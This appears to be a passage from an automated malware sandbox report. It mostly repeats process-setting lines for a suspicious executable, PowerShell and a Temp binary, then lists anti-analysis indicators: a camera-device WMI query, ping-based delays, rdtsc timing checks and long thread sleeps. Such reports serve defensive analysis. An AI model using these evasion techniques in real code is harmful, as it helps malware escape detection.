                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Process information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                  Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exe  Memory allocated: E80000 memory reserve | memory write watch
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exe  Memory allocated: 1AA90000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Memory allocated: 3150000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Memory allocated: 1B3F0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Memory allocated: 1510000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Memory allocated: 1AD40000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Memory allocated: 25B0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Memory allocated: 1A790000 memory reserve | memory write watch
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exe  Code function: 4_2_00007FFD9B94340A rdtsc 4_2_00007FFD9B94340A
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exe  Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 600000
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 599869
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 598640
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 598469
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 598297
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 597469
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 596890
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 596757
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 596500
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 3600000
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 596105
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 595851
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 595703
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 595504
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 595359
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 595249
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 595138
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 595031
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 594797
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 594656
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 594526
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 594417
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 594305
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 594169
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 594043
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 593922
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe  Thread delayed: delay time: 300000
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593797Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593663Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593484Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593193Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593069Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592858Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592750Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592640Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592531Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592422Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592302Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592172Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592062Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591953Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591843Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591734Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591612Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591485Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591359Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591250Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591140Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590921Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590812Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590703Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590594Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590469Jump to behavior
